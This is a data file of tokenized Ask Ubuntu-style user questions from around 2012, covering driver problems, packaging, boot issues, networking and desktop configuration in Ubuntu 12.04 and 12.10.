205958	how to create and submit package for qt application	i have an application that i developed in qt and ubuntu . its primary target is windows but i prefer working in ubuntu for all sorts of obvious reasons , so i rebuild it using qt under xp and create an installer that can be used in xp , vista and w7 . given that it 's developed under ubuntu it seemed a logical step to see if i could also distribute it via the ubuntu software centre . the plan would be to make a small charge for downloading . i registered in the ubuntu application developer programme , set up a myapps account for the application and filled in the application details , marking it as to be uploaded later , but i am confused as to what to do next . according to the 'publish ( uploading your app ) ' page , canonical 'provides the packaging service free of charge ' , but i would welcome clarification on what i need to submit and how . as i plan to charge for the package it presumably makes sense not to use an open source license , and this seems to imply that there is no need for me to create a debian source package . is this a correct assumption ? if so , what would be required in the archive file and how should i submit it , bearing in mind that ppas are for open-source software ( unless i 've misunderstood ) ? as you can probably tell , software packaging is something i have virtually no experience of , so apologies if i 'm asking obvious questions . also , if this is n't the appropriate forum could you suggest a better place to post this query ? some advice on what to do about dependencies ( such as webkit ) would be helpful .
205959	change directory colour displayed in the terminal	i would like to change the colour displayed of some folders when i do ls . right now i have a directory with movies and i would like to be able to see the ones that i have n't seen in a different colour of the ones that i have already seen . anyone can help me ? thanks !
205960	ca n't get movie player to play on my tv via hdmi connection	i am running ubuntu 12.10 on a dell laptop . laptop resolution is 1366x768 . i connected to my phillips 42 '' tv using hdmi . by changing channels i can get to hdmi4 and there my desktop wallpaper appears with an odd contrast , but the movie player with my movie never shows up . any suggestions on what i can do to fix this ? thanks ,
205963	which nvidia driver should i use	my laptop is a toshiba satellite a660 and my video card is geforce gt 330m . i installed ubuntu 12.10 and i would like to know which nvidia driver should i install current , or current update or 304 ?
205966	music does not start in spotify under ubuntu 10.04	i am running spotify 0.8.5 under wine 1.2.2 in ubuntu 10.04 . it was possible to install the spotify application via wine and start the application . i can log into it via facebook ( i have to use the free version , so the native linux spotify versions can not be used ) . i start spotify but when i try to start a song , nothing happens . the time-slider stays at 00:00 . sometimes a song starts for about 17 seconds and i can here the music but then it stops again . have you experience with spotify under ubuntu via wine and can help me to play my songs ? your welcome ,
205969	how do i port a .fon font to a linux font ?	i like the proggyclean fonts a lot and would like to see them in my terminal . the `` true type font '' versions are n't great , but the bitmap ( raster , *.fon ) fonts are excellent . this should be a virtue since the linux fonts are all raster as a matter of course . i think the linux font format is psf2 ( among others ? ) and is detailed here : http : //www.win.tue.nl/~aeb/linux/kbd/font-formats-1.html .
205974	how can i automatically time commands in bash ?	in tcsh , there 's the variable time : the time shell variable can be set to execute the time builtin command after the completion of any process that takes more than a given number of cpu seconds . how do i do this in bash ?
205977	no aparece grub con gpt windows/ubuntu	i have an asus k55vm . the problem is that after installing windows 7 , and then ubuntu 12.10 , grub does not appear . created the partition table with gparted , i did it in msdos format , but later installing windows 7 it did not accept it and said to do it in gpt format , therefore i deleted the disk ( partition table ? ) and i create a partition with 160gb . later on i entered into the live cd to ubuntu , where i created partitions for ubuntu ... i installed and rebooted . restarting grub does not appear , but the windows partitions do appear . i hope someone can assist me with this . ( i 'm desperate ) thank you in advance . solution ? : thank you very much haddisk of 500gb the netbook es new
205981	packaging a header library , header dependencies	when packaging a library a that contains of headers ( similar to boost ) , those headers may have include statements to another header library b in them . consequently , when building an application with a , the headers of b also need to be present in the system . what is the correct way to include this dependency in b in the control file ?
205983	which is the best low/mid level gpu in terms of compatibility for 12.04 and 12.10 ?	i 'm tired of dealing with the disaster that is catalyst on a 4xxx igp and i want to buy some discrete graphics that support both unity and alternative environments like gnome3 and mate-cinnamon without getting sluggish . besides that , 1080p video and some light 3d gaming . again nothing crazy , i 'm not a designer and i wont be using stuff like blender . one thing i want to make clear is that i want a gpu that is 100 % compatible , that means no bugs , no glitches , not having to toggle between propietary and xorg because it decided to crapout on me . thanks for your help
205984	get a list of file types that can be opened with a specific application	in ubuntu , is there any way to obtain a list of file types that can be opened with a specific application ? for example , i 'd like to find a list of all files that can be opened with the program google-chrome . is it possible to do this using a shell script ?
205987	xorg fail to use my graphic card	xorg use the intel gma but i want to use my ati radeon card . here from xorg logs : ( ii ) loadmodule : `` fglrx '' ( ww ) warning , could n't open module fglrx ( ii ) unloadmodule : `` fglrx '' ( ii ) unloading fglrx ( ee ) failed to load module `` fglrx '' ( module does not exist , 0 ) thank you for your help .
205990	is there any simple way to edit shortcuts for any app ?	is there any simple way to edit shortcuts for any app ? ( i am using ubuntu 12.04 , and i did n't find anything really clear by googling or searching on askubuntu )
205992	unable to connect to internet	i just upgraded to 12.10 . everything appears to go well but i am unable to connect to the internet . the lan is fine and i can view my shared files but no e-mail or access to web pages . my other computer which is running 12.04 or older seems to connect fine . i only upgraded one to make sure things would be ok . i am currently connecting fine with a wireless windows laptop . output from cat /etc/resolv.conf # generated by networkmanager nameserver 127.0.0.1
205994	i changed the repository and now my ubuntu software center crashes	paul @ ubuntu : ~ $ software-center 2012-10-24 18:11:04,665 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2012-10-24 18:11:04,671 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2012-10-24 18:11:05,191 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2012-10-24 18:11:05,403 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2012-10-24 18:11:05,920 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 243 , in open self._cache = apt.cache ( gtkmainiterationprogress ( ) ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 102 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 149 , in open self._list.read_main_list ( ) systemerror : e : malformed line 63 in source list /etc/apt/sources.list ( dist parse ) 2012-10-24 18:11:07,255 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 176 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1422 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1352 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 154 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 171 , in init_view self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 238 , in __init__ self.build ( desktopdir ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 511 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 271 , in _build_homepage_view self._append_whats_new ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 450 , in _append_whats_new whats_new_cat = self._update_whats_new_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 439 , in _update_whats_new_content docs = whats_new_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 124 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 317 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 212 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__'
205998	12.10 visual performance using nvidia driver	my fresh ubuntu 12.10 install is slow , not something extreme but dragging windows , switching workspaces and things like that are just slow and look horrible . it feels like the fps is dropping in a game . doing some photoshop work in windows was even a relief ! this effect gets worse if i connect my external monitor . my system is an intel pentium dual core t4500 with 4gb memory and a geforce 8200m g/integrated/sse2 graphics chip . nothing fancy but should be able to run ok. my `` experience '' in ubuntu is set to standard . ( msi cr500 laptop ) i 've installed the nvidia drivers , tried current and experimental and the experimental drivers seem to perform a bit better but overall bad anyway . i set the mode to adaptive in the nvidia-settings tool and it goes to maximum setting directly and does n't come back . using htop i found out that compiz or the x server always use a few percent of my cpu , more than i think it should and the time consumed is 5:18 for compiz , 4:33 for /usr/bin/x and 2:41 for google chrome ( about 30 tabs open so not too strange i think . ) what can i do to increase the visual performance cause this makes me not want to use ubuntu in public !
206003	hard drives mount automatically	i just upgraded to 12.10 and noticed that my media hard drives are mounting automatically . in the past i would have to mount them manually . is this an upgrade feature ?
206009	brightness crash and fan issues in 12.04.1	i would just like to state beforehand that i am a total novice in using ubuntu when it comes to the more complex issues . so i thought it would be best to finally come here and ask for help before being re-directed or closed out for a solution . i have already looked high and low on this board for one but nothing came up for my particular case , so i might as well take a shot asking for the first time here . this is what i have at the moment : -dell insprion 1764 w/ 64-bit intel i5 core -dual boot : windows 7/ubuntu 12.04.1 32-bit ( from 12.04 install ) -unity shell -linux kernel : 3.2.0-32 generic-pae ... and this is my fglrxinfo : opengl vendor string : advanced micro devices , inc. opengl renderer string : ati mobility radeon hd 5000 series opengl version string : 4.2.11627 compatibility profile context the one issue i have with using ubuntu is brightness . with the driver in every time i use the slider in the brightness and lock settings or use the keyboard function , it freezes , goes black and comes up with a scrambled colors page like this in the video . so i have looked all over this board and the web for answers looking for a solution that might have an answer . this is what i have done so far to fix this : -first solution : looking around , i found this small fix using terminal : sudo gedit /etc/rc.local followed by adding this into `` rc.local '' echo # > /sys/class/backlight/acpi_video0/brightness this works rarely with the graphics driver still in and i often get lucky say during restart but reboot would only snap back the brightness at max . -second solution simply remove the graphics driver while leaving the solution of first behind . this solves the issue but results in having the monitor flicker and flash at startup which in itself is not a problem to me but maybe not so good for monitor health . also it causes the fan to speed up throughout the session and render any program that needs the driver useless . -third solution this is the most obvious . just simply use the brightness on amd catalyst control center software that came with the driver , and i can say that it 's form of brightness is horrible compared to the actual settings . which leads up to where i am now , back to the driver to stop the fan speed-up and seems that the only solution to the brightness crash is to use the keyboard-controlled brightness at the login screen not the desktop if i want the issued effect but will just snap at max bright again if i restart . fan speed problem is dealt with but now run the risk of crashing my computer if i so much touch the brightness settings . speaking of which i found this on launchpad and it seems that the issue has been going far since june of 2012 . any help , redirect link or reference would be greatly appreciated . thank you .
206013	wireshark installing	i m going to install wireshark from the following youtube video http : //www.youtube.com/watch ? v=_yyeiv35ile sudo apt-get install wireshark libcap2-bin sudo groupadd wirshark sudo usermod -a -g wireshark debbase but i faced problem while i ran the command sudo usermod -a -g wireshark debbase . it gives the error : user 'debbase ' does not exist what should i do ?
206020	ubuntu bad for webcam recording/screencasting or is it just me ?	i have a few webcams sitting around and i tried recording video using guvcview , vlc , cheese , and a few others and they all have a terrible background noise , and/or the audio is out of sync ... how can i fix this issue , is this a bug in pulseaudio ? screencasting works sometimes , but it usually crashes after about 5 minutes of recording ... .which is a serious problem ! the webcam is a logitech c270 . computer setup nvidia geforce 550ti gpu amd fx 4100 ( 3.6ghz quadcore ) cpu asus m5a97 motherboard . ubuntu 12.04/12.10
206023	how do i prevent kde from messing up my qt dialog button order ?	i use mostly gtk+ applications ( eg . geeqie , audacious , etc . ) on lubuntu . however , i decided to give kde 4 a try by installing kubuntu-desktop and then removing the apps i did n't want . big mistake . now , even when i 'm running lxde with the qt applications running qgtkstyle , apps like k3b use windows/kde button order in dialog boxes rather than the gnome/osx-style button order used by standard gtk+ dialogs . how do i force qt applications back into using the gnome-style button order for dialog boxes ? ( ideally , in a manner strong enough that it 'll stay in effect even if i log into kde , since 90 % of my applications are gtk+ ones regardless of which desktop i run )
206026	pulseaudio crashes when selecting the usb mic device	i 've found an issue after upgrading to ubuntu 12.10 with my shure usb mic . i tried to select the device in pulseaudio and it crashes . the mic is working in audacity , and i can select it with gstreamer-properties . it worked fine in 12.04 .
206028	why does saidar and system monitor show different memory usage	so i noticed that saidar and system monitor show different ram usage , at least i think it is ram usage . is not mem used ram in saidar ? ? is sider a software that can be trusted ? ? what is it showing at all ? ? see saidar is showing i am using 1227 mb system monitor 635mb thank you in advanced .
206032	commercial redistribution of ubuntu	i 'm making a custom ubuntu bootable live cd image by uck . it includes some script and native binary . of course , that follows gpl/lgpl license strictly . is it possible to distribute my custom ubuntu image as commercial use ? if it 's illegal for it , is there any legal way to distribute it commercially ? or must i change other linux distribution , such as centos ? is centos ok to distribute commercially ?
206034	how can i upload my .xsession-errors file to launchpad from the terminal ?	i 'm troubleshooting a gui crash , so i only have tty access to my system , and i need to upload my .xsession-errors file . is there a command to upload a file to an already-existing bug ?
206044	how do i burn ubuntu to a cd so i can run it from the disc instead of having it saved to my harddrive ?	i need to use ubuntu for a class project but do n't want to have it installed on my computer . i was told i could burn it to a disc and run it from there . how do i do that ? i put the windows installer on the disc already but when i go to download ubuntu from that program , it asks me to make a password and user name and the only option it gives for location is my c : \ drive . ( i 'm using windows7 ) and my disc drive is d : \ .
206048	how to run schooldays hq in ubuntu ?	i have tried several times to run schooldays hq through wine and virtualbox without much success , usually text appears but images and animation fails to appear on screen , how can i fix this ?
206052	how to map keys to launch urls in firefox ?	i 'm looking for a way to launch some frequently used urls in firefox using short-cut keys . it would be a great time saver .
206053	how do i pass an option to a unity shortcut ?	how can i pass an option from a unity shortcut ? for instance , can i invoke `` gnome-terminal -- maximize '' instead of `` gnome-terminal '' from the unity shortcut ?
206057	how to fix `` no operation system '' error ?	so my cd drive is damaged , and i wanted to format my pc with a bootable usb with ubuntu on it . everything was ok , i created my bootable usb but when i tried to boot from it , a massage appeared saying : no operation system what should i do ?
206058	ubuntu 12.04 - swiching multiple windows from a program	i 'm having problem switching multiple windows from a same program . for example , if i have 2 windows opened for firefox at the same time and i wanted to switch from one another , it used to display a 2 small grid preview for each session when i click on the icon . however , that function does n't seem to be working on my ubuntu 12.04 now . it does n't response when i click on the firefox ( or other application ) icon in the sidebar . does anyone know how to fix this ? by the way , i know alt+tab can switch windows too , but it 's hard to switch if i have 7 pdf documents opened at the same time . so i really wish to have this feature fixed . thanks in advance .
206059	highpoint rocketraid 62x controller	i have the subject card recently installed in ubuntu 12.04.1 lts ( gnu/linux 3.2.0-31-generic x86_64 ) . see partial lspci -vv listing below ( complete listing played havoc with pre tags ) : 03:00.0 raid bus controller : highpoint technologies , inc. device 0622 ( rev 01 ) subsystem : highpoint technologies , inc. device 0001 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- latency : 0 , cache line size : 32 bytes interrupt : pin a routed to irq 11 region 0 : i/o ports at 9c00 [ size=8 ] region 1 : i/o ports at 9800 [ size=4 ] region 2 : i/o ports at 9400 [ size=8 ] region 3 : i/o ports at 9000 [ size=4 ] region 4 : i/o ports at 8c00 [ size=16 ] region 5 : memory at fdbff000 ( 32-bit , non-prefetchable ) [ size=2k ] expansion rom at fdbe0000 [ disabled ] [ size=64k ] capabilities : i followed instructions i found at https : //help.ubuntu.com/community/rocketraid to compile the drivers for it , and although performing the process described there seemed to work fine with no noticeable errors , when i rebooted after performing that procedure i could not boot . during dkms steps , i noticed messages indicating that ( if next boot fails , revert to initrd.img-3.2.0-31-generic.old-dkms image ) update-initramfs ... ... ... ... ... . so i booted using a ubuntu 12.10 livedvd and reverted to the old-dkms initrd.img as suggested above , but this failed to repair the boot problem . ultimately , i used https : //help.ubuntu.com/community/boot-repair in ubuntu-secure-remix to fix the boot problem and was able to boot normally again , but now with the newly generated initrd.img in place again ( which now boots normally ) , when i modprobe the rr62x kernel module , i immediately get a hard crash with messages to console about a kernel paging request that seems to have caused the problem . i 've tried on multiple occasions now to use the newly built kernel module so as to allow me to use an esata port multiplier plugged into the card , but to no avail . any suggestions on fixes or workarounds ( i 've read that some of the highpoint cards ( 2720sgl ) seem to work as a host bus adapter and thus may not need a custom driver , but that seems not to be the case for mine ) would be most appreciated . my goal is to use the card as described here and with software raid mdadm utilities . if necessary , i can hand-copy the console messages after the hard crash into a follow-up message , but i obviously ca n't do a cut/paste . i 'll gladly provide any other details that are needed , but not sure what those would be at this point , so i 'll refrain from adding other details for now . thanks in advance for any help . update well unfortunately , this issue is more complicated than it appeared to be two days ago when i answered my own question and thought i had the issue resolved . although upgrading the kernel did allow me to finally boot the kernel and load the rr62x module without an obvious machine lockup/crash , i was never able to actually use the hardware , and upon more investigation of this today , i now see that this rr62x module generated a kernel oops : nov 5 10:06:38 hp2home kernel : [ 19.360006 ] rr62x : [ 0 1 3 ] device probed successfully . nov 5 10:06:38 hp2home kernel : [ 20.395211 ] scsi8 : rr62x nov 5 10:06:38 hp2home kernel : [ 20.395777 ] bug : unable to handle kernel paging request at 0000000000050005 nov 5 10:06:38 hp2home kernel : [ 20.395798 ] ip : [ < ffffffffa01d3543 > ] hpt_queuecommand_lck+0xd3/0xf30 [ rr62x ] nov 5 10:06:38 hp2home kernel : [ 20.395820 ] pgd 1b0465067 pud 1b0464067 pmd 0 nov 5 10:06:38 hp2home kernel : [ 20.395827 ] oops : 0000 [ # 1 ] smp nov 5 10:06:38 hp2home kernel : [ 20.395834 ] cpu 1 nov 5 10:06:38 hp2home kernel : [ 20.395837 ] modules linked in : rr62x ( po ) nouveau ttm drm_kms_helper drm i2c_algo_bit mxm_wmi video hid_generic usbhid hid wmi sata_sil24 pata_marvell forcedeth sata_nv nov 5 10:06:38 hp2home kernel : [ 20.395867 ] nov 5 10:06:38 hp2home kernel : [ 20.395870 ] pid : 298 , comm : scsi_scan_8 tainted : p o 3.5.0-17-generic # 28-ubuntu hewlett-packard hp compaq dx2450 microtower/2a72h nov 5 10:06:38 hp2home kernel : [ 20.395883 ] rip : 0010 : [ < ffffffffa01d3543 > ] [ < ffffffffa01d3543 > ] hpt_queuecommand_lck+0xd3/0xf30 [ rr62x ] nov 5 10:06:38 hp2home kernel : [ 20.395896 ] rsp : 0018 : ffff8801b1471990 eflags : 00010202 nov 5 10:06:38 hp2home kernel : [ 20.395902 ] rax : ffff8801b071b400 rbx : ffff8801b071b400 rcx : ffff8801b06c00f0 nov 5 10:06:38 hp2home kernel : [ 20.395908 ] rdx : ffff8801b071b600 rsi : 0000000000000000 rdi : ffff8801b06c00d8 nov 5 10:06:38 hp2home kernel : [ 20.395915 ] rbp : ffff8801b14719f0 r08 : 0000000000000000 r09 : 0000000000000024 nov 5 10:06:38 hp2home kernel : [ 20.395922 ] r10 : 0000000000000000 r11 : 0000000000000024 r12 : ffff8801b06c00d8 nov 5 10:06:38 hp2home kernel : [ 20.395928 ] r13 : ffff8801b05ae800 r14 : ffff8801b06c0000 r15 : 0000000000050005 nov 5 10:06:38 hp2home kernel : [ 20.395935 ] fs : 00007f3bf573f700 ( 0000 ) gs : ffff8801bfc80000 ( 0000 ) knlgs:0000000000000000 nov 5 10:06:38 hp2home kernel : [ 20.395943 ] cs : 0010 ds : 0000 es : 0000 cr0 : 000000008005003b nov 5 10:06:38 hp2home kernel : [ 20.395949 ] cr2 : 0000000000050005 cr3 : 00000001b0480000 cr4 : 00000000000007e0 nov 5 10:06:38 hp2home kernel : [ 20.395955 ] dr0 : 0000000000000000 dr1 : 0000000000000000 dr2 : 0000000000000000 nov 5 10:06:38 hp2home kernel : [ 20.395963 ] dr3 : 0000000000000000 dr6 : 00000000ffff0ff0 dr7 : 0000000000000400 nov 5 10:06:38 hp2home kernel : [ 20.395970 ] process scsi_scan_8 ( pid : 298 , threadinfo ffff8801b1470000 , task ffff8801b14f1700 ) furthermore , the presence of the rr62x module in the kernel also seems to have caused problems with my other raid card ( raid bus controller : silicon image , inc. sii 3132 serial ata raid ii controller ) as with rr62x in the kernel , any time i booted the machine with the first ( the original post was about a second pmp plugged into an add-on raid card ) pmp powered on , the machine would lockup during boot up , and when i boot the machine without the first pmp powered on , it completes boot up ( although with the aforementioned oops in the log ) . i 've since run sudo dkms remove -m rr62xla -v 1.0 -- all and now i boot with no problems with the first pmp and no oops , so it 's pretty clear that the rr62x module is the problem , but it sure looks like other people are using it without problems , so if anyone has any further ideas , i sure would appreciate seeing them . alternatively , since the original post got so little attention , i 'm wondering if these types of problems are beyond the scope of this particular forum , and if anyone has ideas regarding the best place to ask this question , i 'd welcome seeing those too . lastly , could someone explain this bounty business a little better ? i read the documentation on this site about bounties , but i had the impression that by answering my own question , i would have the option of awarding myself the 50 rep points that i put on the original question , and now i 'm finding that 's apparently not the case ? it 's no big deal , but i 'd like to understand how this bounty thing works better , in particular when the op answers his own question . tia .
206061	where can i submit release codename suggestions	i want to submit a ubuntu release codename ... where can i do this at ? i went to https : //wiki.ubuntu.com/developmentcodenames to try and submit an idea but there is n't any location there to do so ...
206068	ubuntu 12.10 wifi hotspot problem	after upgrade ubuntu to 12.10 ( x64 ) ( pure install ) , my phone ca n't find my notebook 's wifi hotspot . the hotspot was created by click 'create new wireless network ... ' from the network indicator menu , it works for previous ubuntu versions . but now it does n't ! by the way , the windows 7 's hotspot works just fine . ( dual-boot system ) my notebook is lenovo ideapad y450 , i can connect to wifi , but ca n't set hotspot . any suggestions ?
206071	make recovery disk for customers	i hear about other computer shops that sells customers recovery disks that they have created . i 'm assuming all that they do is make a image and uses an automation script that allows this to be done . i have seen where clonezilla does this , but it has to be the same hdd size or they might have problems down the road . is there any other freeware that i could do this with that allows you to use on any size disk . ghost is really good for this because it automatically fills up empty space with the partition and never needs any user input or `` expert mode '' like clonezilla . but it is not freeware .
206072	how do i tell which was the original version of ubuntu installed on a machine ?	i 've got a few machines which i 'm upgrading from version to version for a few years . i 'm curious to find out what was the original version of ubuntu installed on the machine . is there a way to do that ?
206082	how do i compile ndiswrapper ?	i have been working for a good 2 days now trying every forum post i could find when it comes to ndiswrapper . i can get it installed but get the error module ndiswrapper not found keeps coming up . in my travels , this is a bug in the installer and i have to build it from source . i have no clue how that works . is there anyone out there that can give me an idea of where to start ? i do n't even know where to begin .
206086	`` permission denied '' error	alright so i installed ubuntu last night and i am very new to everything . right now i am trying to run a program called jes , ( jython environment for students ) . the instructions tell me to cd to the jes directory i have , so i type cd /home/programs/jes it takes me to the directory i need to be in , so far so good . then i have to type in : ./jes.sh and i get this returned to me : bash : ./jes.sh : permission denied i have very little comprehension of what to do in terminal or anything of the sort . any help would be appreciated . i have tried using sudo -l to get permissions but it still persists .
206088	is ssd trim support still automatic in 12.10 ?	folks i had automatic trim working on my laptop running ubuntu precise . as in the trim guide i added discard to mount options in /etc/fstab , and hdparm -- read-sector read 0s immediately after a rm & & sync . using the very same hardware , laptop and ssd , trim seems no longer to be automatic after upgrading to quantal . i recognise the test in the guide i mentioned above may not necessarily work . ssd erase blocks and all that . but quantal is at least different . after deleting the file and syncing , its data are still on disk and unerased even after waiting several minutes . fstrim will then 0 the dead file 's blocks . once . repeat the same test five minutes later , and fstrim does nothing . i figure this is probably really a kernel issue , but that box is too black for my spelunking torch . i 'm prepared to believe that kernel 3.5 knows what i want better than i do , and all is well despite appearances , but it looks for all the world like trim is n't quite all there any more . anybody have the scoop on trim in quantal/kernel 3.5 ?
206095	is my asus 1000h netbook good enough for ubuntu 12.10 ?	i am looking to switch my asus 1000h netbook ( n270 1.6ghz processor ) from xp to ubuntu . is the latest version 12.10 the most suitable for this machine ?
206100	are there keybboard drivers for a compaq kb-9963 keyboard ?	i am running 12.04 x64 and got a keyboard . i recieved a compaq kb-9963 keyboard from my teacher today . i looked for the windows drivers but could only find them for windows xp , so not recent drivers . are there drivers available for this keyboard that will let me utilize the shortcut keys on there ?
206101	how do i get windows previews when hovering over icons in the launch bar ?	guys i saw a video on the net regarding compiz to enable windows preview option when i hover a mouse over it . that would be similar as in windows 7 . i installed compiz through ubuntu software centre and then i searched and found that there is no option called `` windows preview '' in it ! there is a unity option but it does n't have a windows preview option . also i would like the freedom to move unity anywhere from top-bottom-left-right . will this damage my system ? please reply at the earliest : -|
206102	what should i do when i lack space to upgrade to ubuntu 12.10 ?	could you help me ? i was trying to upgrade my compaq 510 from 12.04 to 12.10 . but unfortunately the upgrade fails because i do n't have enough free space for the temporary files . could you tell me how to make room for the upgrade ? on windows , you would use disk cleanup to empty some space . but how can i do this on ubuntu ? is there an app that works the same way ? there 's so much app in windows 7 & ubuntu and then , this time it 's left 1 gb with total around 74 gb if not wrong . except d : / ( data ) partition total 160 gb . please think the c : / ( system ) partition .
206105	screen flickers	i am running 12.04 lts and the screen flickers like hell once i sign and even at the grub boot menu . i have an nvidia 7300gt card and 24 '' hp lcd monitor [ model lp2465 ] i have tried every trick i know from installing different drivers to editing grub to editing xorg.conf at no avail . the other thing is my monitor always displays as `` unknown `` and `` crt `` instead of `` hp '' and `` lcd `` although i get the correct 1920x1200 resolution any ideas ? thanks a lot in advance p.s . : i have searched literally tens of articles and forums . none offered a solution that worked
206112	network manager issues after upgrading to 12.10	i have upgraded from 12.04 to 12.10 and upgrade went smoothly , but after the restart i was not able to access the internet and unable to ping any domain like google.com , though i was able to access my wireless router . after investigating i found out that /etc/resolv.conf contains loopback address ( 127.0.0.1 ) i updated this file with google public dns address ( 8.8.8.8 ) and tried to restart network manager and then my system got struck eventually i have to reboot it.after rebooting i was able to access internet , but problem does n't get over yet now when ever i switch the network dns network does n't get change with network ( i am on dhcp ) , which i need to change manually every time . i understand that the loop back address was correct /etc/resolv.conf as network manger should handle the dns server but unfortunately it did n't work out for me .
206119	ca n't find windows 's partitions in linux	i have made dual boot system with ubuntu and windows 7 ( preinstalled given by manufacturer on laptop ) . i am not able to find my windows drives ( c : , d : drives ) in ubuntu . how can i access window 's drives in ubuntu ?
206123	problem in installing ubuntu 12.04 in asus laptop	i am facing problems in installing ubuntu 12.04 in my asus a52 laptop . i selected 'install ubuntu alongside windows 7 ' . then a window appeared : left side , there was 45.9 gb , right side it has 9.9 gb . after clicking 'install now ' , a window appeared named 'write previous changes to disk and continue ? ' i clicked 'continue ' . then appeared the following notification : error : 'parted ca n't resize partitions managed by windows dynamic disk' now what should i do now ? i have 7 drives in windows : c : 42.7gb ( 7.53gb free ) d : 25.2gb ( 3.24gb free ) e : 273gb ( 15gb free ) f : 70.4gb ( 13gb free ) h : 10gb ( 1.93gb free ) i : 24.4gb ( 315mb free ) k : 9.76gb ( 9.68gb free ) i have windows 7 installed in c drive . is it a partioning problem ?
206128	change default home folder application for ctrl+super+e	i went to keyboard application to set a shortcut for the home folder ( set to ctrl+super+e as default ) but for some reason it launches pcmanfm and not nautilus . i tried several things such as edit files in /usr/share/applications or gksudo nautilus /usr/share/applications , but i ca n't find where is the setting that launches pcmanfm ( at the files i can see exec=nautilus % u ) . i 'm using ubuntu 12.10 .
206130	how to turn off wireless network permanently in ubuntu 12.10	i 'm using ubuntu 12.10 with win7 on sony vaio . i want to turn off wireless network permanently in ubuntu just like `` vaio smartnetwork '' does in windows every time system boots . please help .
206137	ubuntu all versions from 10.04 till 12.10	is simply enabling the firewall ufw ( sudo ufw enable ) sufficient enough for protection of the os ? i mean should extra rules be added for 'better ' protection , or is simply enabling the firewall enough for good results and protection from hackers or other stuff ? with the output of sudo ufw status verbose i get standard : deny ( icomming ) / allow ( outgoing ) and status : active it 's a bit confusing when some experts throw in that extra rules should be made , since uwf active without rules give absolute no protection .
206139	ubuntu desktop or server as dedicated server	i am considering to host my website with ubuntu as a dedicated server . but what variant of ubuntu should i choose , ubuntu desktop or ubuntu server edition ? please provide a reason of choosing either . update note : the dedicated server will host my clients websites ( around 100s ) and also it need to work as web server/database server/ftp server and other application servers .
206141	can ubuntu run on a microsoft surface with windows rt ?	my family might be buying a windows surface tablet with windows rt ( nvidia ) ? i was wondering if i can run ubuntu or wubi on it for my homework ?
206145	i have updated 12.04 to 12.10 . problem black screen	i have dual boot on my pc , windows 7 and ubuntu . after upgrading from 12.04 to 12.10 , i restarted my system and get this black screen : when i press ctrl + alt + f7 it allows me to login ! i donât want to have to do this each time , does anyone know how to fix it ? thank you for your help .
206148	kernel update : kvm disabled by bios	i read a text about kernel stable and i updated my kernel to 3.6.1 . and i solved problems like wifi and resolution but i cant solve kvm disabled by bios . before update i did n't see this kvm : disabled by bios thanks for helps
206152	markup software with images and conversion to .doc and .pdf	i need a simple markup that would allow me to include chunks of code and images , and be able to produce .doc ( or .rtf ) and .pdf documents . a bit ( or maybe a lot ) like the stackexchange markup , but with conversion to pdf and word documents . i am producing a lot of documentation for the statistical analyses i am doing , and this documentation is then passed on to scientists who work predominantly with word . requirements : basic markup ( document structure , bold , italic ) chunks of code or preformatted text ( syntax highlighting a plus ) including external images in the viewer export to pdf and word doc/docx/rtf ( html a plus ) i am considering writing a few latex based perl scripts for myself , but maybe there is software like that already out there ?
